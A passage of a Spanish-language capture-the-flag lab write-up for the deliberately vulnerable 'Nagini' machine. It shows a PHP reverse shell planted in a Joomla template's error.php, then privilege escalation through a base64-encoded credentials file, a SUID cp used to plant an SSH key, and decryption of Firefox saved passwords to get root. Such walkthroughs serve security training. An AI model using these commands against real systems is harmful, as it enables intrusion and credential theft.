<p>Para ganar acceso a la máquina se modificó la página de error del template usado seleccionando en el panel superior del sitio <code>Extensions &gt; Templates &gt; Templates &gt; Seleccionar template en uso</code> y dentro del modo de &quot;edición&quot; se seleccionó y modificó el archivo <code>error.php</code> poniendo una instrucción de ejecución de comandos como:</p>
<pre><code class="language-php">system('bash -c &quot;bash -i &gt;&amp; /dev/tcp/10.10.0.128/1234 0&gt;&amp;1&quot;');
</code></pre>
<p>Guardando el archivo y disparándolo con un error HTTP 404, por ejemplo, navegando a <code>http://10.10.0.129/joomla/index.php/rutainexistente</code>.</p>
<p><img src="images/exploit_4.png" alt="Reverse shell en error.php" /></p>
<p><em>Dado que el presente write-up se trabajó en el laboratorio señalado, la conexión de la reverse shell se mandó al nodo más cercano (Aragog), en el cual, mediante <code>socat TCP-LISTEN:1234,fork TCP:192.168.111.162:1234</code> se redirigió el tráfico de red a la máquina atacante.</em></p>
<p>Obteniendo así acceso a la máquina y el primer horrocrux.</p>
<pre><code class="language-bash">└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.111.162] from (UNKNOWN) [192.168.111.175] 49402
bash: cannot set terminal process group (854): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Nagini:/var/www/html/joomla$ cd ..
www-data@Nagini:/var/www/html$ ls -la
total 356
drwxr-xr-x  3 root     root       4096 Apr  4  2021 .
drwxr-xr-x  3 root     root       4096 Apr  3  2021 ..
-rw-r--r--  1 root     root     323790 Apr  2  2021 harry_potter_2.jpg
-rw-r--r--  1 ron      ron          63 Apr  4  2021 horcrux1.txt
-rw-r--r--  1 root     root         61 Apr  4  2021 .htaccess
-rw-r--r--  1 root     root         97 Apr  2  2021 index.html
-rw-r--r--  1 root     root        612 Apr  2  2021 index.nginx-debian.html
-rw-r--r--  1 root     root        854 Apr  4  2021 internalResourceFeTcher.php
drwxr-xr-x 17 www-data www-data   4096 Apr  3  2021 joomla
-rw-r--r--  1 root     root        234 Apr  3  2021 note.txt
www-data@Nagini:/var/www/html$ cat horcrux1.txt
horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}
</code></pre>
<h2 id="post-explotación"><a class="header" href="#post-explotación">Post Explotación</a></h2>
<h3 id="escalación-de-privilegios"><a class="header" href="#escalación-de-privilegios">Escalación de privilegios</a></h3>
<h4 id="www-data--snape"><a class="header" href="#www-data--snape">www-data → snape</a></h4>
<p>Dentro del directorio <code>/home/snape</code> se encontró el archivo <code>.creds.txt</code> al cual se tenía lectura, desencodeando el contenido en base64 se obtuvo una shell como el usuario <code>snape</code>.</p>
<pre><code class="language-bash">www-data@Nagini:/home/snape$ ls -la
ls -la
total 32
drwxr-xr-x 4 snape snape 4096 Apr  4  2021 .
drwxr-xr-x 4 root  root  4096 Apr  4  2021 ..
-rw-r--r-- 1 snape snape  220 Apr  3  2021 .bash_logout
-rw-r--r-- 1 snape snape 3526 Apr  3  2021 .bashrc
-rw-r--r-- 1 snape snape   17 Apr  4  2021 .creds.txt
drwx------ 3 snape snape 4096 Apr  4  2021 .gnupg
-rw-r--r-- 1 snape snape  807 Apr  3  2021 .profile
drwx------ 2 snape snape 4096 Apr  4  2021 .ssh
www-data@Nagini:/home/snape$ cat .creds.txt
cat .creds.txt
TG92ZUBsaWxseQ==
www-data@Nagini:/home/snape$ cat .creds.txt | base64 -d &amp;&amp; echo
cat .creds.txt | base64 -d &amp;&amp; echo
Love@lilly
</code></pre>
<h4 id="www-data--hermoine"><a class="header" href="#www-data--hermoine">www-data → hermoine</a></h4>
<p>Dentro del directorio <code>/home/hermoine</code> se encontró una copia del binario <code>cp</code> con permisos de SUID, al contar con este permiso y dado que el servicio <code>ssh</code> se encuentra disponible se podría generar una llave ssh para este usuario y pegar la pública dentro de <code>/home/hermione/.ssh/authorized_keys</code>.</p>
<pre><code class="language-bash"># Kali
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/srrequiem/.ssh/id_rsa): ./hermione_id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./hermione_id_rsa
Your public key has been saved in ./hermione_id_rsa.pub
The key fingerprint is:
SHA256:guTPHqxLBjUO/euSXDbm4CHuMHT8RwFJlcLXirZBEIo srrequiem@pwnchadnezzar
The key's randomart image is:
+---[RSA 3072]----+
|   o=oo.o        |
|. .. =.o .       |
|E.. * +..        |
|  .* B ..        |
| ..o= =.S        |
|. o.+=*o         |
|o. +oX*o         |
| o.o=+o.         |
| .. ooo          |
+----[SHA256]-----+

# Copiar contenido de ./hermione_id_rsa.pub

# Nagini
snape@Nagini:/home/hermoine$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFu+CNPc/WM1fvrT1gIfuTYmpIq6RRqTHZTP+3H22OiSHgyN2LmhQqw0EO9y6CBecm9p3vEUrI98ErzSSsZbihn7IeGlK6yaomLmiEYJphq3bzjXkqZb6nWYATqSeV3WkC6Br3bNJsZWg8AVbqlCGRL2VGca6Mw30rB6tej68Qr+1XOmDEKhjMeCD/CHqXi1r29mUBoPAT8YxhGyY9vLFgf5fLNzZRZfKWfmusiPSnxrzyKTPpuj0rmwkAOf/gC6BHKC13PwON+ykxFP1+6PiSC2TF8K87mT2KHFHwB7wQurjaVez30fAaodU5toIYj/XWhWYxZmith/fvus7H2JUqJZeULeT5fPKf1SKJXgBsM6oyHq1lr/2isNvoIb7eCAoQTdJObBCpahWhhalKC+VbxES+dVgSZ0k0v4I0zENB/snqYUAzqKprwykVKRz12Oj/hYbRk2rUj9nwcTl/Ol9WLhwaQlir5RJiTEws8a8+g5qKXTXEqel+X2WIyoQS9tc=' &gt; /tmp/hermione.pub
snape@Nagini:/home/hermoine$ bin/su_cp /tmp/hermione.pub .ssh/authorized_keys

# Kali
└─$ ssh hermoine@10.10.0.129 -i hermione_id_rsa
Linux Nagini 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr  4 16:43:01 2021 from ::1
hermoine@Nagini:~$
</code></pre>
<p>De esta manera se podría extraer el segundo horrocrux.</p>
<pre><code class="language-bash">hermoine@Nagini:~$ ls -la
total 28
drwxr-xr-x 6 hermoine hermoine 4096 Apr  4  2021 .
drwxr-xr-x 4 root     root     4096 Apr  4  2021 ..
drwxr-xr-x 2 hermoine hermoine 4096 Apr  4  2021 bin
drwx------ 3 hermoine hermoine 4096 Apr  4  2021 .gnupg
-r--r----- 1 hermoine hermoine   75 Apr  4  2021 horcrux2.txt
drwx------ 5 hermoine hermoine 4096 Jun  1  2019 .mozilla
drwxr-xr-x 2 hermoine hermoine 4096 Mar  9 02:53 .ssh
hermoine@Nagini:~$ cat horcrux2.txt
horcrux_{NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU=}
</code></pre>
<h4 id="hermoine--root"><a class="header" href="#hermoine--root">hermoine → root</a></h4>
<p>Dentro del usuario en turno, se identificaron archivos de mozilla firefox, los cuales al indagar al respecto se encontró el repositorio de <a href="https://github.com/lclevy/firepwd">firepwd</a> que con los archivos dentro de <code>.mozilla</code> (key3.db o jey4.db y logins.json) permite descifrar las contraseñas protegidas de firefox.</p>
<p>Al copiar el <code>/home/hermoine/.mozilla/firefox/g2mhbq0o.default/key4.db</code> y <code>/home/hermoine/.mozilla/firefox/g2mhbq0o.default/logins.json</code> en la máquina local para la ejecución del script <code>firepwd.py</code>, se extrajo la contraseña de root de la siguiente manera:</p>
<pre><code class="language-bash">└─$ python firepwd.py -d /home/srrequiem/Documents/ecpptv2_lab/2_nagini/content/
globalSalt: b'db8e223cef34f55b9458f52286120b8fb5293c95'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.12.5.1.3 pbeWithSha1AndTripleDES-CBC
     SEQUENCE {
       OCTETSTRING b'0bce4aaf96a7014248b28512e528c9e9a75c30f2'
       INTEGER b'01'
     }
   }
   OCTETSTRING b'2065c62fe9dc4d8352677299cc0f2cb8'
 }
entrySalt: b'0bce4aaf96a7014248b28512e528c9e9a75c30f2'
b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.12.5.1.3 pbeWithSha1AndTripleDES-CBC
     SEQUENCE {
       OCTETSTRING b'11c73a5fe855de5d96e9a06a8503019d00efa9e4'
       INTEGER b'01'
     }
   }
   OCTETSTRING b'ceedd70a1cfd8295250bcfed5ff49b6c878276b968230619a2c6c51aa4ea5c8e'
 }
entrySalt: b'11c73a5fe855de5d96e9a06a8503019d00efa9e4'
b'233bb64646075d9dfe8c464f94f4df235234d94f4c2334940808080808080808'
decrypting login/password pairs
http://nagini.hogwarts:b'root',b'@Alohomora#123'
</code></pre>
<p>Teniendo así acceso a <code>root</code> y al tercer horrocrux.</p>
<pre><code class="language-bash">hermoine@Nagini:~/.mozilla$ su -
Password:
root@Nagini:~# ls -la
total 68
drwx------  5 root root   4096 Feb  6 02:14 .
drwxr-xr-x 18 root root   4096 Apr  4  2021 ..
-rw-------  1 root root     44 Apr  4  2021 .bash_history
-rw-r--r--  1 root root    570 Apr  3  2021 .bashrc
drwx------  3 root root   4096 Mar 31  2021 .gnupg
-rw-r--r--  1 root snape   810 Apr  4  2021 horcrux3.txt
drwxr-xr-x  3 root root   4096 Feb  6 02:14 .local
-rw-------  1 root root    298 Apr  4  2021 .mysql_history
-rw-r--r--  1 root root    148 Apr  3  2021 .profile
-rw-r--r--  1 root root     74 Mar 31  2021 .selected_editor
drwx------  2 root root   4096 Mar 31  2021 .ssh
-rw-------  1 root root  13566 Apr  4  2021 .viminfo
-rw-r--r--  1 root root    213 Apr  3  2021 .wget-hsts
-rw-------  1 root root     52 Apr  4  2021 .Xauthority
root@Nagini:~# cat horcrux3.txt
  ____                            _         _       _   _
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/


Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Medium
Machine Name: Nagini
Horcruxes Hidden in this VM: 3 horcruxes

You have successfully pwned Nagini machine.
Here is your third hocrux: horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}




# For any queries/suggestions feel free to ping me at email: time4ster@protonmail.com
</code></pre>
<h2 id="notas-adicionales"><a class="header" href="#notas-adicionales">Notas adicionales</a></h2>
<p>Dentro de la búsqueda para la extracción de las contraseñas de mozilla firefox, se encontró el script <a href="https://fossies.org/linux/hashcat/tools/mozilla2hashcat.py">mozilla2hashcat.py</a> que permite extraer el hash del archivo protegido <code>key3.db</code> o <code>key4.db</code>.</p>
<h2 id="referencias"><a class="header" href="#referencias">Referencias</a></h2>
<ul>
<li><a href="https://github.com/cloudflare/quiche">quiche - HTTP3 client</a>.</li>
<li><a href="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#gopher">Hacktricks - SSRF gopher</a>.</li>
<li><a href="https://github.com/tarunkant/Gopherus">Github - gopherus</a>.</li>
<li><a href="https://github.com/lclevy/firepwd">Firepwd.py, an open source tool to decrypt Mozilla protected passwords</a></li>
<li><a href="https://fossies.org/linux/hashcat/tools/mozilla2hashcat.py">mozilla2hashcat.py</a></li>
</ul>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                            <a rel="prev" href="../../../guides/ecpptv2_lab/1_aragog/index.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>
                            <a rel="next" href="../../../guides/ecpptv2_lab/3_fawkes/index.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <i class="fa fa-angle-right"></i>
                            </a>
                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                    <a rel="prev" href="../../../guides/ecpptv2_lab/1_aragog/index.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>
                    <a rel="next" href="../../../guides/ecpptv2_lab/3_fawkes/index.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <i class="fa fa-angle-right"></i>
                    </a>
            </nav>

        </div>

        <script type="text/javascript">
            window.playground_copyable = true;
        </script>
        <script src="../../../elasticlunr.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="../../../mark.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="../../../searcher.js" type="text/javascript" charset="utf-8"></script>
        <script src="../../../clipboard.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="../../../highlight.js" type="text/javascript" charset="utf-8"></script>
        <script src="../../../book.js" type="text/javascript" charset="utf-8"></script>

        <!-- Custom JS scripts -->
    </body>
</html>
